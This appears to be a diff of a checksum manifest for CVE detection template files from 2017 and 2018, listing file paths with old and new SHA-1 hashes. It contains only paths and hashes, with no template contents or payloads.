-http/cves/2017/CVE-2017-18487.yaml:e678859471adf95616654e951dacb100f0a4b008 -http/cves/2017/CVE-2017-18490.yaml:05f380c419e4fd376d41980a0860e6a29a216397 +http/cves/2017/CVE-2017-17731.yaml:a10f23cfa55f0b85fb4d4661c7c2de1d4e8dcf4f +http/cves/2017/CVE-2017-17736.yaml:64472321916c2c290e330560e5bee830428e72cb +http/cves/2017/CVE-2017-18024.yaml:ce879eb9bd8fa9f0bacc1586ff4bd49db69db6e0 +http/cves/2017/CVE-2017-18487.yaml:254f2789826ff34af6f50a3488c782b86503fbd0 +http/cves/2017/CVE-2017-18490.yaml:f509d7e4e8305ebc31e875aaf594666e43ab4c1b http/cves/2017/CVE-2017-18491.yaml:35123c5d542c4653b9a517440e8b37339d5be870 -http/cves/2017/CVE-2017-18492.yaml:02ac749cc09efe88246d1b95f6acda31205b0cc2 -http/cves/2017/CVE-2017-18493.yaml:c6ddbeb40c5c02a8bf54679175916308d7d33d33 -http/cves/2017/CVE-2017-18494.yaml:a24f421fd7f12231ca22432adfaa5c75718b2a67 -http/cves/2017/CVE-2017-18496.yaml:0e22a2d8407f8465522fec2595b87c1163aa050b -http/cves/2017/CVE-2017-18500.yaml:e402befb9d2614512354735511854db8b26ef84c -http/cves/2017/CVE-2017-18501.yaml:119d4419349428821d94c69bfc1fbfbbe58716f6 -http/cves/2017/CVE-2017-18502.yaml:ab92f9e06cdd974b8706eb52f8ef6f21a402e4ea -http/cves/2017/CVE-2017-18505.yaml:fdd6323f99e83031fc4d3be3382d37561bf96296 -http/cves/2017/CVE-2017-18516.yaml:72b23e2184d02278895420c105d91ab21472460b -http/cves/2017/CVE-2017-18517.yaml:4ea0c059c4b750f8f43d5e2cc97ccb50e6103926 -http/cves/2017/CVE-2017-18518.yaml:fa4d2d38376f55347402a575740b371699c9f1e8 -http/cves/2017/CVE-2017-18527.yaml:5c9dda769b1e3107cce0e7b48166fa2fc3558b0c -http/cves/2017/CVE-2017-18528.yaml:717404d28d6384d422d2e50914e03540c2ada6af -http/cves/2017/CVE-2017-18529.yaml:4efa8170495c76c945566e4ffb11dbce660a2480 -http/cves/2017/CVE-2017-18530.yaml:c647db9820ecd67c20c8972e3a9a1ba8fb3cefc1 -http/cves/2017/CVE-2017-18532.yaml:65f91385a2d9813a9ae81ac66afba35758c51050 -http/cves/2017/CVE-2017-18536.yaml:b0712b092bb90051ecb0abde523d6b88f4d2c10f -http/cves/2017/CVE-2017-18537.yaml:390a4488b9a58d60cc71a4c5a6e002d61d2c36ab -http/cves/2017/CVE-2017-18542.yaml:9dbe4f11304e82fbaed0f9feef87a4b2bd401e99 -http/cves/2017/CVE-2017-18556.yaml:f9048cc3e2412118aa7faeff5272af10d627073c +http/cves/2017/CVE-2017-18492.yaml:62457b45e8f45d546d39edf101bd009872072ce1 +http/cves/2017/CVE-2017-18493.yaml:8585dc681ce46dbeba85a6219b7804fb32003463 +http/cves/2017/CVE-2017-18494.yaml:bde46b640fffb3a2811b7bd78309354da0d708bb +http/cves/2017/CVE-2017-18496.yaml:6ebc5ef6cb0e7bf0adc59c0ce237fbe4da0b32c9 +http/cves/2017/CVE-2017-18500.yaml:edfc10d272b9928638caa03b4e3e44cc6c93e6d3 +http/cves/2017/CVE-2017-18501.yaml:bbe735209e4fcaa5e926e3ec17a6e307c3c9f5d5 +http/cves/2017/CVE-2017-18502.yaml:a65b27bfa99a77919df06b5d974ee44b9c292726 +http/cves/2017/CVE-2017-18505.yaml:36b371cdd9738c7acd505733d7e5e3303c4e3c0b +http/cves/2017/CVE-2017-18516.yaml:2a97b5723bcf2b4f90a3594c864744cad024a520 +http/cves/2017/CVE-2017-18517.yaml:abfabe97f9d1ae8f1cc0da53fb416a98b3d3b5a0 +http/cves/2017/CVE-2017-18518.yaml:5464ecfd336faf3078c922213da5e95f30b06c20 +http/cves/2017/CVE-2017-18527.yaml:b0e89cc0adcb62f8260c91b1a4b7e74557fef6c0 +http/cves/2017/CVE-2017-18528.yaml:389a34feaa354ae892eff52887eab1b8ad82422e +http/cves/2017/CVE-2017-18529.yaml:d99e7be412eb3cdc4e399e0ea68079772f8a8e28 +http/cves/2017/CVE-2017-18530.yaml:73e955c3492b10d0bc5cce52dac8205a3b6698db +http/cves/2017/CVE-2017-18532.yaml:80e5ae3c005744178f5eb7fd04c7c44ebda264a6 +http/cves/2017/CVE-2017-18536.yaml:9747022096c37d4c29f4181e542718b078bdb5b8 +http/cves/2017/CVE-2017-18537.yaml:ba223ffc652fb88d3abc4d7b55d617c2b1f9fe44 +http/cves/2017/CVE-2017-18542.yaml:45784ba4a66183c4a5ede9cfcce7a97deb6cc529 +http/cves/2017/CVE-2017-18556.yaml:f5b115c2feb93f4672ed655a02683ab232c9c3ca http/cves/2017/CVE-2017-18557.yaml:6e1891a94bea72c3022a0b53c434b13080b895ac -http/cves/2017/CVE-2017-18558.yaml:682a038d54dd7f8c63d8062ee6588321741e1eda -http/cves/2017/CVE-2017-18562.yaml:8645a9b7fbcedb0591bef917f877d03e06170dc4 -http/cves/2017/CVE-2017-18564.yaml:67e889f8ad7181e23da3086765d2d4f0c724e571 -http/cves/2017/CVE-2017-18565.yaml:b61a61613e45e893068d445e6b53044e9ef0cef9 -http/cves/2017/CVE-2017-18566.yaml:67e6b591cfe8e9c49c68eb1177c7bb731bac5e37 -http/cves/2017/CVE-2017-18598.yaml:d3b822d1bf9fa086a96234df76402ea27b05adf1 -http/cves/2017/CVE-2017-18638.yaml:3936fa284c768b63cab6c43856c9832039c3de35 +http/cves/2017/CVE-2017-18558.yaml:3b9a98e236785cb9b474493b6f37e9f78ad01d27 +http/cves/2017/CVE-2017-18562.yaml:a2e58e873feb5c83d659ea4ae132d88e22708d4a +http/cves/2017/CVE-2017-18564.yaml:83819e25a255ecf107c53db3e187bccbfd445e4f +http/cves/2017/CVE-2017-18565.yaml:07636d743615e770c6ae854fcd60f3428ffadf57 +http/cves/2017/CVE-2017-18566.yaml:e99e157ce6b17daa408f3926763ffaab8bd6b234 +http/cves/2017/CVE-2017-18598.yaml:6b1a9dd6cfa7ac18a692bbfbc0b866cf52c27049 +http/cves/2017/CVE-2017-18638.yaml:90d492decbd0c3d5912a7cb073ac4e0604003770 http/cves/2017/CVE-2017-3506.yaml:2e923049df918dd48d091fce0ea0f20026e2a653 -http/cves/2017/CVE-2017-3528.yaml:029efb804d94626f6a2249dbbc9a12c46565bdf8 -http/cves/2017/CVE-2017-4011.yaml:f3ed33a3e5cf8161635396c930f78a1e9bde5492 -http/cves/2017/CVE-2017-5487.yaml:0c81e8981c3300885e29b32e6f3651968771fd3f +http/cves/2017/CVE-2017-3528.yaml:c2433462b2071c25e36889be82e5a2f3275cfae5 +http/cves/2017/CVE-2017-4011.yaml:6638e6d28f971ea46e567a988b4285c3e25147bc +http/cves/2017/CVE-2017-5487.yaml:58c0c93e8b88071cddec3f57dbce65f5b49708e3 http/cves/2017/CVE-2017-5521.yaml:5a1eadb693b825b078e68a3b68515fe5e29e8767 -http/cves/2017/CVE-2017-5631.yaml:6636b0db5389600b8037527911a0d34fc1e078d2 +http/cves/2017/CVE-2017-5631.yaml:d0e7d60dcf68f36b2fcdefc7ed3b5c74af6b39f5 http/cves/2017/CVE-2017-5638.yaml:35bbc13688e4ec4e1d13602c78e0d1cdc2bb0f31 http/cves/2017/CVE-2017-5689.yaml:8388597c365f47be033e2ab6818211a3200179b1 -http/cves/2017/CVE-2017-5982.yaml:5cbef57bcce612947b29e6382652454cd1779ab8 +http/cves/2017/CVE-2017-5982.yaml:d3e8357e28e745dcce068a7eb2c1f8e63dc95808 http/cves/2017/CVE-2017-6090.yaml:0a06423bae5ea9f50365faacad04658e4e122391 http/cves/2017/CVE-2017-7269.yaml:d710b9227b669d05ce36e9118451b9ee365a8236 http/cves/2017/CVE-2017-7391.yaml:b5889ce92e0470ec57b0eea81afb12b36a73778a http/cves/2017/CVE-2017-7615.yaml:af2d8b71e292a278837eb4638bae7dd888b07acc -http/cves/2017/CVE-2017-7921.yaml:99b7498b18bb111478c0cfbc10f8a0dae1ffa37d -http/cves/2017/CVE-2017-7925.yaml:6aaf24e7e7691c5333e23db8c23dfb2dc4e76d15 -http/cves/2017/CVE-2017-8229.yaml:b71fbc16c47ce7e4b24d95b2d460f2097a5275e7 +http/cves/2017/CVE-2017-7921.yaml:4fc2af600bf1bf333e716b8fb7004b1ed1b58531 +http/cves/2017/CVE-2017-7925.yaml:a3b124f1992dea42c0785923a627b0ee02d51b78 +http/cves/2017/CVE-2017-8229.yaml:5e80b42efebda579da77eed58ab8a22c302e084e http/cves/2017/CVE-2017-8917.yaml:83589e7baa37aeffa9401fd6726b1fbf67f8e4b6 -http/cves/2017/CVE-2017-9140.yaml:5f0ce2f8f9b19205800a0a13cf1059c79ae6e2c6 -http/cves/2017/CVE-2017-9288.yaml:e8fc9654d4682553a6f9ce85c52719a3a3e6fb0a -http/cves/2017/CVE-2017-9416.yaml:22e923983e4c66b6887135a31b532deee5cb4820 -http/cves/2017/CVE-2017-9506.yaml:e2834c9301ec49eed7f2568e144c5b63555b56e3 +http/cves/2017/CVE-2017-9140.yaml:9f746ca03b1f473804e35a2b85c24b797b1d42ac +http/cves/2017/CVE-2017-9288.yaml:ff7e2a4c9d405805cf327f60260035f5b48298af +http/cves/2017/CVE-2017-9416.yaml:a38dcda0c54f01acabe38578d374e37e21675761 +http/cves/2017/CVE-2017-9506.yaml:04006800029221a5d253bff83d6a7a9a8cf38e45 http/cves/2017/CVE-2017-9791.yaml:73d3c0ba7050453bedbff8622bea648d7b1b584a http/cves/2017/CVE-2017-9805.yaml:16a849a9bc00a73aa6f751ecbd2f6fff793247da -http/cves/2017/CVE-2017-9822.yaml:c60e30aaa1f031062e206a3067d0081257b0d1da -http/cves/2017/CVE-2017-9833.yaml:737534862eed6e0b9ab662f5e981eada2631ddb8 +http/cves/2017/CVE-2017-9822.yaml:a47423fcd139816c89b6c4ebcdfdb692efc5715c +http/cves/2017/CVE-2017-9833.yaml:b332a3b4881ee84d250933668df1ad1fc8804e5e http/cves/2017/CVE-2017-9841.yaml:af72f3df431c43b747f87752b38cd061c868e2ce -http/cves/2018/CVE-2018-0127.yaml:afef683953f3c0c09d3b126aecc571f96d44523f -http/cves/2018/CVE-2018-0296.yaml:39c4713b6f0299cd21146583cf3be41317f28262 -http/cves/2018/CVE-2018-1000129.yaml:8d32698235db84511416fa4fd0f851e7292d77c5 -http/cves/2018/CVE-2018-1000130.yaml:63efbbcb9f8dea9d7823598c2ba6187add2423b4 -http/cves/2018/CVE-2018-1000226.yaml:78614be0254497b3526d67dfd32a1fbf1bc9f95a +http/cves/2018/CVE-2018-0127.yaml:1b34044f01cb4ed3a83f4b264bdd16aece4586d2 +http/cves/2018/CVE-2018-0296.yaml:8ccf75b3acb7b8dfeec1975b83cc362f9ba606b4 +http/cves/2018/CVE-2018-1000129.yaml:de2390c5055096963963ff677d293bf61c1f415f +http/cves/2018/CVE-2018-1000130.yaml:f20836925415061de074bc8c0e623742245e0f65 +http/cves/2018/CVE-2018-1000226.yaml:c7afd7fa1ebe0084003d9a65793f91c0d9c6fc60 http/cves/2018/CVE-2018-1000533.yaml:72fe743af21ecdedbda5170acc92e007d42bd99a http/cves/2018/CVE-2018-1000600.yaml:0df75105401991a9e86ecb21344aa588318e1651 -http/cves/2018/CVE-2018-1000671.yaml:017a249569e89a4192661d1c2b34306f4fa09952 -http/cves/2018/CVE-2018-1000856.yaml:f4b23be2af37dcb7e90990ea297f642331f01372 +http/cves/2018/CVE-2018-1000671.yaml:9e965c9664ef3ddaeb1d91191aaf365a6b62296b +http/cves/2018/CVE-2018-1000856.yaml:5e2098afb4f301251ac12e91340f15d322fe178a http/cves/2018/CVE-2018-1000861.yaml:a42f05bad0223a0fce8fa0b8e78492a947db7f61 -http/cves/2018/CVE-2018-10093.yaml:3432e194ad96cc71dc165d19ae129b8b7db5d687 -http/cves/2018/CVE-2018-10095.yaml:5d343b6db7df92531c2b5236d0cf3eeb7614b55a -http/cves/2018/CVE-2018-10141.yaml:6fdac0009031b3694d335b9739071fbcc8e9c41c -http/cves/2018/CVE-2018-10201.yaml:49233c2f9a0007e2e6d86033933f5cfbe3328409 -http/cves/2018/CVE-2018-10230.yaml:8b00d6660bc8a837662b8570ea96f3409bd8a8af +http/cves/2018/CVE-2018-10093.yaml:c64fd6535a0c7035b2e2acb2f4ba447099496545 +http/cves/2018/CVE-2018-10095.yaml:900a9b20357659cae37119e38f575a4e8129a129 +http/cves/2018/CVE-2018-10141.yaml:57805566b9153b6792cbb297c54ca2cc5539ab6f +http/cves/2018/CVE-2018-10201.yaml:a005040e47f64b4443215593f445b0a13301d98e +http/cves/2018/CVE-2018-10230.yaml:5a87035e57e2d093db6bf7bf7f16c691bdb07860 http/cves/2018/CVE-2018-10562.yaml:4061af42048be9f4fcdee29f8007e73f7202016c http/cves/2018/CVE-2018-10818.yaml:a7fa0aec3caa627fe454421831f62bc991eed9d6 -http/cves/2018/CVE-2018-10822.yaml:9a75cc9a88921902ca8565a4e05dacc49a2b889b +http/cves/2018/CVE-2018-10822.yaml:73bcf02c1c56c89124460c4bc953fdc964389c6b http/cves/2018/CVE-2018-10823.yaml:df0e7df1ad89e0895d249c3e751e859f7d9054be http/cves/2018/CVE-2018-10956.yaml:9a4a700f09ea757df334929431ef2ff61af3b6ae http/cves/2018/CVE-2018-11227.yaml:85c649db0defc93808052a2b3b8d9d42b99c990c -http/cves/2018/CVE-2018-11231.yaml:3834fc0752e11dfbdd8d36f8c684c41b62a94688 -http/cves/2018/CVE-2018-11409.yaml:de786ce330df835c9ed5fcd055710caf4df1f45b -http/cves/2018/CVE-2018-11473.yaml:3d5162f6763ae313bac96e3564b004d21a70241e -http/cves/2018/CVE-2018-11709.yaml:a78e4d3e1ca9b6ff4ae6bd16e0de7a000d0d5b78 -http/cves/2018/CVE-2018-11759.yaml:8efe93300a69d5bf3233f8e095134c5543d3024f +http/cves/2018/CVE-2018-11231.yaml:bb5669eb0a4601b670d1841663f73ab382ac3cf1 +http/cves/2018/CVE-2018-11409.yaml:db89950414cae378c1638c3b16950b96ceee264f +http/cves/2018/CVE-2018-11473.yaml:d828ace79994a38528a1fa88b721d538bf4cf1d5 +http/cves/2018/CVE-2018-11709.yaml:fbc9f6b7099895bc79849846c1905402fd9b94e7 +http/cves/2018/CVE-2018-11759.yaml:31374e4b6543a5fe1f540dead8ec9a1fddf30aca http/cves/2018/CVE-2018-11776.yaml:a36f7ba7796e879ff19d74fc11989596dcf388a1 -http/cves/2018/CVE-2018-11784.yaml:5df9478234f4f9d30a92210c5422be805052e2f6 -http/cves/2018/CVE-2018-12031.yaml:54180db568e6b2c33def7488e27443ef538bd25d -http/cves/2018/CVE-2018-12054.yaml:ef474283648e45b23d45fe10943a848114172664 -http/cves/2018/CVE-2018-1207.yaml:d342912c4e1a39a5033e767e605757255c62b5e7 -http/cves/2018/CVE-2018-12095.yaml:15f3af781ba51d03044c77caba5390da4bebf982 -http/cves/2018/CVE-2018-12296.yaml:e1bcead8ffee6228a76609c16cad19c15b9a1993 -http/cves/2018/CVE-2018-12300.yaml:eb3fc98e7397a12252d1145cf9d3f4daa747b58e +http/cves/2018/CVE-2018-11784.yaml:709495b23cc504a7947a9cbcc19088943e878f4f +http/cves/2018/CVE-2018-12031.yaml:dbc2c50807b0cd0fc83715391e0a35a2125703d6 +http/cves/2018/CVE-2018-12054.yaml:f743122000735c3f96028e9b5c5dbb992154531d +http/cves/2018/CVE-2018-1207.yaml:5e7a5f87454369ff0b257491637a2a6e20027ecd +http/cves/2018/CVE-2018-12095.yaml:de76fa47a68892f7f81b320dacbacc874b6f12b7 +http/cves/2018/CVE-2018-12296.yaml:d66cad99b0a3796bcf09d3520c859184d6bf98fe +http/cves/2018/CVE-2018-12300.yaml:f5e485db51dc4046c0c4d3a8bf66481e199bb2e3 http/cves/2018/CVE-2018-12613.yaml:a638318403b6d8d05e0fe8c50ddead1771a25e94 -http/cves/2018/CVE-2018-12634.yaml:8cf1a4627672bf5e0c279bfb72bdb92654156d39 -http/cves/2018/CVE-2018-12675.yaml:293da7d85eb83e6764180380cdf06aefcafd7695 -http/cves/2018/CVE-2018-1271.yaml:cc41c7e8451d50b988f1784c80414184d31f95b5 -http/cves/2018/CVE-2018-1273.yaml:f3a477d4ea54302609a2ef76c35b69b036c97873 -http/cves/2018/CVE-2018-12909.yaml:7aa222057028d502ef1a8933cf8f9c013f220ff5 +http/cves/2018/CVE-2018-12634.yaml:eae2e9afb39f1558c17c79d3a65adb448f3f04be +http/cves/2018/CVE-2018-12675.yaml:3af72b467e0a9a10f4b42375ca03bdbef76d7392 +http/cves/2018/CVE-2018-1271.yaml:dfb1636fec78b89ff45372ecf4a58b8e35d40799 +http/cves/2018/CVE-2018-1273.yaml:b962d560b247efc74e12676cff6b8ee870486d27 +http/cves/2018/CVE-2018-12909.yaml:746f3a8de41ebd966d77cc2881cb84d1833c5aa2 http/cves/2018/CVE-2018-12998.yaml:735310cf02041dca4a48d939da17379061307e0e http/cves/2018/CVE-2018-1335.yaml:ef09b7a34428f9c37aebd7396e1aeebed73be810 http/cves/2018/CVE-2018-13379.yaml:ffc186496ab1ecfdf410079054f75b7372cdedf4 -http/cves/2018/CVE-2018-13380.yaml:2cbbc2da9a2d92b07dcf0b73d6f135974f213d1e -http/cves/2018/CVE-2018-13980.yaml:2b9697efbd12262d7d4c6b99c153e712d649b92c -http/cves/2018/CVE-2018-14013.yaml:396857b0a440053b96d5048ee7184759ecc01e4e +http/cves/2018/CVE-2018-13380.yaml:5614d176f38c549dd3af4eb13c6439e0651bcc5f +http/cves/2018/CVE-2018-13980.yaml:a077077707bdd4500ae5eb187ff4838d4ae4473f +http/cves/2018/CVE-2018-14013.yaml:bbbe19ef4b1a6b61867d6d1af197ca9fa9ffad9a http/cves/2018/CVE-2018-14064.yaml:3bc6d48521b038071497e743b4d6b48adf793bcf -http/cves/2018/CVE-2018-14474.yaml:dcc70ab39b1b990de839f9835845b9cef80fe957 -http/cves/2018/CVE-2018-14574.yaml:4c4e28b966fe2555525a8fbe7696c60a872369b6 +http/cves/2018/CVE-2018-14474.yaml:64ebafd25bb1a4e0b68733f1363186f5122e307b +http/cves/2018/CVE-2018-14574.yaml:51f65ef9156e826032fb1856d1ba7d3bd83605f1 http/cves/2018/CVE-2018-14728.yaml:b58bd92a62ed0f8b7127a28ca468f8e130b44632 http/cves/2018/CVE-2018-14912.yaml:e64a776b25e614b595db3e33f8e76642800f52ee -http/cves/2018/CVE-2018-14916.yaml:582f08377a5e0c32742c0f9cf3dbb4b994078f6b -http/cves/2018/CVE-2018-14918.yaml:8d8202d214ff1b0581968b4f4598cc48a8b0cbaa -http/cves/2018/CVE-2018-14931.yaml:1b6c91649d84ffdbd331dd258d354c9cd5879bf1 +http/cves/2018/CVE-2018-14916.yaml:4f31015208d5951477c007a7867eefc18022cd93 +http/cves/2018/CVE-2018-14918.yaml:fac56bcebb6835aef933010d61671c1f544490b4 +http/cves/2018/CVE-2018-14931.yaml:913e04ac9404da58b65b94766d8f79ff1f856368 http/cves/2018/CVE-2018-15138.yaml:575c3edc6639100b87812046d94ac441434679ee -http/cves/2018/CVE-2018-15517.yaml:1dcd4d1c347de61166c198d121fdb10a049ea2e6 +http/cves/2018/CVE-2018-15517.yaml:14bd95b6e11cb107bae90bb3fae5e0cd41759e0f http/cves/2018/CVE-2018-15535.yaml:86e065d76a19654dbc1564d9f919e426cb839d87 -http/cves/2018/CVE-2018-15745.yaml:6eb0feebf8be4318d9ae0325eb34c29e98e46f9b -http/cves/2018/CVE-2018-15917.yaml:a185ab225f4a462bb5c9a0c71123e966a01aaa6a +http/cves/2018/CVE-2018-15745.yaml:26db2c651b0b36677cceb565c69d551bcc1e1f04 +http/cves/2018/CVE-2018-15917.yaml:5fe8e3acdc3ad96c6d707fe6b9bdacde096d7e36 http/cves/2018/CVE-2018-15961.yaml:684f63db1dd854bad32c1fd68013289e74dfa77e -http/cves/2018/CVE-2018-16059.yaml:ba433a71a3e4943f838efaae5a5e93f2a140b89e -http/cves/2018/CVE-2018-16133.yaml:03a890ae24aa08a98634ecec837f7eda10f0bf10 -http/cves/2018/CVE-2018-16139.yaml:d849d163241a379e6d96260df8386d581d08e525 -http/cves/2018/CVE-2018-16159.yaml:b415a34ea5c715a82ecd2474f418eed75af80252 -http/cves/2018/CVE-2018-16167.yaml:d3ec6901d84a723d4ffe72a3a8f76baecdf5a3bb -http/cves/2018/CVE-2018-16283.yaml:e75c7c69dec765538b026f2f5d34bb265317f1db -http/cves/2018/CVE-2018-16288.yaml:b32999c9b9e21ac25f0696d4aacbb114e24e3ed2 -http/cves/2018/CVE-2018-16299.yaml:fd57a02f2a2572b2a0861bb3bf108d62a06f0612 +http/cves/2018/CVE-2018-16059.yaml:530c5014764c9521f6bd1f0be0822f6b6d3da4f4 +http/cves/2018/CVE-2018-16133.yaml:116bf276b397d743d3e9bd669c7b6b514c55f5f2 +http/cves/2018/CVE-2018-16139.yaml:b63d43503695c992d197358a79853bed7efe97dc +http/cves/2018/CVE-2018-16159.yaml:fb72f90b21682ec838cbbbbfb13ccf81d123e4af +http/cves/2018/CVE-2018-16167.yaml:100ab46f84577595645edc1d74c300e3a2bc1cfa +http/cves/2018/CVE-2018-16283.yaml:1a1f8321d4d2d8b9747fbf8e1275a1bf8fbc3a2c +http/cves/2018/CVE-2018-16288.yaml:47153221b78e900555895a8fb948f54b922b2a22 +http/cves/2018/CVE-2018-16299.yaml:5b0fae1d59631adbc582c0e503008d0649eb2181 http/cves/2018/CVE-2018-16341.yaml:0e46eee24d582952eee8b66879b5817147e220ce -http/cves/2018/CVE-2018-16668.yaml:71972d73bdd31ae99ed7cd2fe463c38c41fbb003 -http/cves/2018/CVE-2018-16670.yaml:08f6d7163294a6297a07a538abd197b9bd55dfa1 -http/cves/2018/CVE-2018-16671.yaml:0d43ad53989af11bb00582f291fc597bc117667e -http/cves/2018/CVE-2018-16716.yaml:92f90b35db4898bb1bfe78278e4f139030f01a3b -http/cves/2018/CVE-2018-16761.yaml:5f2ec4fe54e40e31fb1126a0e095390c1feea764 +http/cves/2018/CVE-2018-16668.yaml:dbe41f4095dc10d53b14884103c5b822c1ad2927 +http/cves/2018/CVE-2018-16670.yaml:b5b35dc26b0f2e99435926c73a58049df50a3b14 +http/cves/2018/CVE-2018-16671.yaml:7f4c7fb383fe0513a74422197f923697959c2d0c +http/cves/2018/CVE-2018-16716.yaml:7bdde5724c768246c0bb1db923a289fb558cc6a8 +http/cves/2018/CVE-2018-16761.yaml:3ccb1e9aa3f9cbc0a90d58702a76134b8bffb5c4 http/cves/2018/CVE-2018-16763.yaml:ded61a1bfdb7051a9e67e4dc81bc00383da637ad -http/cves/2018/CVE-2018-16836.yaml:2d287685546efa1f45e5b41a61a7b54f3f5cc6c9 -http/cves/2018/CVE-2018-16979.yaml:716ec1395e6472afab6056db2e8b73df0f5fd7c6 -http/cves/2018/CVE-2018-17153.yaml:796375e70165c6cc8749d4a87ea17913e97ce582 -http/cves/2018/CVE-2018-17246.yaml:56d078ed297b275ed1a9904c71bbddb93dea62ff -http/cves/2018/CVE-2018-17254.yaml:7a27701cce72ed26d7129ca3b2a7978334a95a12 -http/cves/2018/CVE-2018-17422.yaml:73695c3386650e1fb1934da44106cf7d6bacabca -http/cves/2018/CVE-2018-17431.yaml:3a3989a77fd7fd97c06bba2c7eea47b01df7f531 -http/cves/2018/CVE-2018-18069.yaml:a8433c142a11008a7d39f660d0745a59115faaf5 +http/cves/2018/CVE-2018-16836.yaml:3f055272bfaca22293781937133c8e6d560a3fa1 +http/cves/2018/CVE-2018-16979.yaml:83fb78fe52f5bebe5f8caa4031827d8904d7761c +http/cves/2018/CVE-2018-17153.yaml:9d6884ccc76caa608024a130e94e1e048f3c803f +http/cves/2018/CVE-2018-17246.yaml:fefb8304e1ef0f78770994fe103dc9f10c6246d0 +http/cves/2018/CVE-2018-17254.yaml:952cfdbef27a1570b7242e91ab55d8515f252ad5 +http/cves/2018/CVE-2018-17422.yaml:3883173a3e07ede99ed3c453c57c22d7004e499f +http/cves/2018/CVE-2018-17431.yaml:79d17ddbf86196ebe4f6274ea64e0a3bc2752fb3 +http/cves/2018/CVE-2018-18069.yaml:04229aabf0dee60c5c9512ccba169b2373fc9de1 http/cves/2018/CVE-2018-18264.yaml:9576e1aeefcd79e9c8515210f92c9ae93e55d982 http/cves/2018/CVE-2018-18323.yaml:be24af760ca169f849d0058c02ec982ae07ed93c -http/cves/2018/CVE-2018-18570.yaml:3a880a6dddd10447177f4d814a5184a000258ebd -http/cves/2018/CVE-2018-18608.yaml:68080bc880b40e20db8661426e7e8fe4809ef8ee -http/cves/2018/CVE-2018-18775.yaml:335f56c9e0f990ea8f1f9ecab0cc6157adffa7c2 -http/cves/2018/CVE-2018-18777.yaml:09768ada20e55f42aea23afb2927841df7018f94 +http/cves/2018/CVE-2018-18570.yaml:fb096ad2c2efafc2a079c9c03b1749e44890fefc +http/cves/2018/CVE-2018-18608.yaml:0b502f41d7cb4a3cf9979b2742ecb1b6ae1255ce +http/cves/2018/CVE-2018-18775.yaml:032bb0dbea6ae6020e7f9b2aab05648318d1dfbe +http/cves/2018/CVE-2018-18777.yaml:44ab6fa7ffcf429a1368122bf618730a00d41500 http/cves/2018/CVE-2018-18778.yaml:f8fbdaf45541f54b07e063b31cf28ce6d1698fbf -http/cves/2018/CVE-2018-18809.yaml:0c7c5b1b7f19275ab831f2b464b32cd5fb436ffe -http/cves/2018/CVE-2018-18925.yaml:94bec0f83fb7e714cc7ef2ca76da28e85fd743f5 -http/cves/2018/CVE-2018-19136.yaml:86af52c8f1a7808a6bf3eb0962dfa429b0180fae -http/cves/2018/CVE-2018-19137.yaml:a6b2889f84fb0b09bdbe1cbfbb3ba7a78620b871 -http/cves/2018/CVE-2018-19287.yaml:eae5382dd3f18808795842c2c566ee690febb675 -http/cves/2018/CVE-2018-19326.yaml:6ec1995dcbef69b71821d0ad575c8d1574bc437a -http/cves/2018/CVE-2018-19365.yaml:de86c719465c5178cd514a3a63be11afe97aab95 -http/cves/2018/CVE-2018-19386.yaml:24abec06cd37f466efdb12688934eb93b8a22d1d -http/cves/2018/CVE-2018-19439.yaml:1ce09b170169c87603e035dc700429805f9e9cd2 -http/cves/2018/CVE-2018-19458.yaml:52acb7b402dd7a2c299744907880b2af433b79f5 -http/cves/2018/CVE-2018-19749.yaml:7759465af0374ffced408e858b4d9389c7db6eba -http/cves/2018/CVE-2018-19751.yaml:86693648b95699feab3118d1cab957e665293831 -http/cves/2018/CVE-2018-19752.yaml:3266077250dc864674f9fe70fd9d744f21c83324 -http/cves/2018/CVE-2018-19753.yaml:422fc412e78d0919fedcae0a05790d87f670ffc2 -http/cves/2018/CVE-2018-19877.yaml:066aed5d76212a8f4c7f4ab3ab098e6b8deb0779 -http/cves/2018/CVE-2018-19892.yaml:cb80aa9ac1404ce982140400d315fdc2cfca321e -http/cves/2018/CVE-2018-19914.yaml:5eab214d21e391883a6ae0779ee8f4ad31a2604b -http/cves/2018/CVE-2018-19915.yaml:beb1e402de2f5c391ab5d9814eee398a4de1b961 -http/cves/2018/CVE-2018-20009.yaml:7480fe6d78661f62b97edcd90d6135d009cba2b2 -http/cves/2018/CVE-2018-20010.yaml:d87bb78452058ca4745d3067c6dbbb8c91469cf9 -http/cves/2018/CVE-2018-20011.yaml:8a416056dea660224a1552482b4ad2056adcc816 -http/cves/2018/CVE-2018-20462.yaml:770310942ae3b14249555249a9dda5328999fd1a -http/cves/2018/CVE-2018-20463.yaml:aa13b5478c225100fe44f46c210a496f98e6e930 +http/cves/2018/CVE-2018-18809.yaml:f2b57482eef72c4d1966537997a0b8dcf44b29a5 +http/cves/2018/CVE-2018-18925.yaml:e2c1d0dd7704818f82196d7db500727185c4ee23 +http/cves/2018/CVE-2018-19136.yaml:aeb2ed38c8217a12990b936ee7ddeb8a4301281f +http/cves/2018/CVE-2018-19137.yaml:d8a65e92435d137f776949bbfcf882c51b88263a +http/cves/2018/CVE-2018-19287.yaml:940eeb6331aa23561fe90190b0f2cda783ca8da6 +http/cves/2018/CVE-2018-19326.yaml:5f8e37633bd0b1201352276bc6f857e4aca7cb78 +http/cves/2018/CVE-2018-19365.yaml:4381f2b928a989569abcb924e189cf63f3f86c30 +http/cves/2018/CVE-2018-19386.yaml:505b19aa726dfe7645a659b90a27b38112cf0221 +http/cves/2018/CVE-2018-19439.yaml:612a7cb5f490a830f9405c4b1a2e7dd85ff02fac +http/cves/2018/CVE-2018-19458.yaml:517ead3bf327c2b5a7401ba2be9e16e202a1c118 +http/cves/2018/CVE-2018-19749.yaml:b75be9c57a509318dec78bac79b63df6538c589f +http/cves/2018/CVE-2018-19751.yaml:1b43802e499f442143329fe1dba45499467143cd +http/cves/2018/CVE-2018-19752.yaml:ab95e3f778eee0fce6624d39ea44b10e04e3cbe0 +http/cves/2018/CVE-2018-19753.yaml:86701b2093de6f82840f988bf6ef27afe7ba0bff +http/cves/2018/CVE-2018-19877.yaml:8b06d82bc4f57c571c48982817acb1ac55695ac9 +http/cves/2018/CVE-2018-19892.yaml:12510167130afb40c241b06a2dd377a7b33cc9a3 +http/cves/2018/CVE-2018-19914.yaml:0f17f2821f88d344f134750ec36fe5e53d524321 +http/cves/2018/CVE-2018-19915.yaml:f0fe0bf101f4420b41b230fdfb95f0340e2723fb +http/cves/2018/CVE-2018-20009.yaml:26df578fc02ea7dc0723ceee689ccff10c022cae +http/cves/2018/CVE-2018-20010.yaml:a99dcf17eb8fbf8fb39ef7da7081d343d8164964 